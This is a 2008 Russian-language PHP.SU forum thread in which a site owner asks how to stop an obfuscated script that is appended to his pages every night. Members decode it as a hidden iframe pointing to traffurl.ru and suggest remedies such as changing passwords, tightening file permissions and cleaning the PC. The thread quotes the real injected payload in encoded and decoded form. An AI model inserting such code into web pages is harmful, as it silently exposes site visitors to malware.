PHP.SU

Программирование на PHP, MySQL и другие веб-технологии

PHP.SU Портал

Главная

Помощь

Поиск

Поиск Яндекс Вакансии

Пользователи

Здравствуйте, Гость

( Вход · Регистрация · Правила форума )

Забыли пароль?

Вирус на странице

Форумы портала PHP.SU » Разное » Прочее (Модераторы: RomAndry, ALEN, Строитель)

Страниц (1): [1]

Описание: скрипт закачивает вирус

Поиск в теме | Версия для печати

Mister	Отправлено: 03 Апреля, 2008 - 15:53:52
Посетитель Покинул форум Сообщений всего: 282 Дата рег-ции: Янв. 2007 Откуда: Сухиничи Калуж.обл. Помог: 0 раз(а) [+]	Подскажите, может кто-то сталкивался с таким: Уже неделю борюсь с такой проблемой, ночью на страницу index постоянно в конец файла записывается следующий скрипт eval(u n e s c a p e("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%2 7%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%2 0%6e%61%6d%65%3d%63%34%66%61%65%61%36%62%37% 63%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f %2f%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6 %69%76%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%6 4%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29 %2a%32%33%36%38%38%29%2b%27%31%35%64%32%64 %5c%27%20%77%69%64%74%68%3d%34%32%20%68%65 %69%67%68%74%3d%35%36%34%20%73%74%79%6c%65 %3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f% 6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); Теги скрипт я убрал и переносы строки сделал. Каждый день его из всех страниц приходится удалять, подскажите как от этого избавиться? ----- ..я не специалист, а только учусь

EuGen	Отправлено: 03 Апреля, 2008 - 15:57:21
Профессионал Покинул форум Сообщений всего: 9095 Дата рег-ции: Июнь 2007 Откуда: Berlin Помог: 707 раз(а)	Попробуйте запретить всем запись в этот файл и что из этого выйдет. Если у Вас Windows, включите аудит на доступ по записи к этому файлу. Если Linux - посмотрите в логах. ----- Есть в мире две бесконечные вещи - это Вселенная и человеческая глупость. Но насчет первой .. я не уверен.

Mister	Отправлено: 03 Апреля, 2008 - 16:00:09
Посетитель Покинул форум Сообщений всего: 282 Дата рег-ции: Янв. 2007 Откуда: Сухиничи Калуж.обл. Помог: 0 раз(а) [+]	Ладно, попробую. Дело в том что происходит это на 2 хостингах. Один из них не даёт изменить прав доступа. ----- ..я не специалист, а только учусь

Dastar	Отправлено: 03 Апреля, 2008 - 16:40:59
Частый гость Покинул форум Сообщений всего: 199 Дата рег-ции: Янв. 2008 Откуда: Израиль Помог: -6 раз(а)	Значит обратись к администрации этого хостинга, так как это и в их интересах. ----- Не знаешь - молчи.

RomAndry	Отправлено: 03 Апреля, 2008 - 16:49:21
Частый посетитель Покинул форум Сообщений всего: 913 Дата рег-ции: Янв. 2008 Помог: 6 раз(а)	1. НЕМЕДЛЕННО СМЕНИТЬ ПАРОЛИ 2. Удалить ТОТАЛ и не заходить с него 3. вылечить компьютер 4. не посещать более левых сайтов!

valenok	Отправлено: 03 Апреля, 2008 - 17:11:01
Здесь могла бы быть ваша реклама Покинул форум Сообщений всего: 4574 Дата рег-ции: Июль 2006 Откуда: Israel Помог: 3 раз(а)	После чего один раз проредактировать весь код ( можно сравнивать файлы из бэкапа с текущими ) Вирус наверное не у хостера. Один из ваших скриптов сам дописывает эту фигню в конец файла. Текст там получается такой: PHP: скопировать код в буфер обмена <iframe=2 0name=c4faea6b7= 633 src=\'http:/ /traffurl.ru/s=6 iv?'+Math.roun=6 4(Math.random() *23688)+'15d2d \' width=42 he ight=564 style =\'display: no= 6ee\'></iframe> ----- Truly yours, Sasha.

Mister	Отправлено: 04 Апреля, 2008 - 10:46:16
Посетитель Покинул форум Сообщений всего: 282 Дата рег-ции: Янв. 2007 Откуда: Сухиничи Калуж.обл. Помог: 0 раз(а) [+]	В общем на одном хостинге, где поддержка php есть после смены прав доступа ничего подобного больше нет. А вот на хостинге, где поддержки php нет, я ни права доступа изменить не могу, ни пароли поменять, т.к. таких услуг хостер не предоставляет. Но сегодня туда опять этот скрипт подписался. И логи не могу там посмотреть, их там просто нет. А проблема пока осталась. ----- ..я не специалист, а только учусь

EuGen	Отправлено: 04 Апреля, 2008 - 10:50:04
Профессионал Покинул форум Сообщений всего: 9095 Дата рег-ции: Июнь 2007 Откуда: Berlin Помог: 707 раз(а)	Значит уходите с того хостинга и все. Если проект серьезный - оно того стоит. ----- Есть в мире две бесконечные вещи - это Вселенная и человеческая глупость. Но насчет первой .. я не уверен.

Mister	Отправлено: 04 Апреля, 2008 - 11:29:26
Посетитель Покинул форум Сообщений всего: 282 Дата рег-ции: Янв. 2007 Откуда: Сухиничи Калуж.обл. Помог: 0 раз(а) [+]	Уже второй год пытаюсь, но хостинг не на меня оформлен, а на того на кого он оформлен, я ему уже 4 месяца пытаюсь объяснить, что такое хостинг и как с ним работать. Спасибо за ответы, с одним хостингом всё-таки разобрался. ----- ..я не специалист, а только учусь

Поиск в теме | Версия для печати

Страниц (1): [1]

Сейчас эту тему просматривают: 0 (гостей: 0, зарегистрированных: 0)

« Прочее »

Все гости форума могут просматривать этот раздел.
Только зарегистрированные пользователи могут создавать новые темы в этом разделе.
Только зарегистрированные пользователи могут отвечать на сообщения в этом разделе.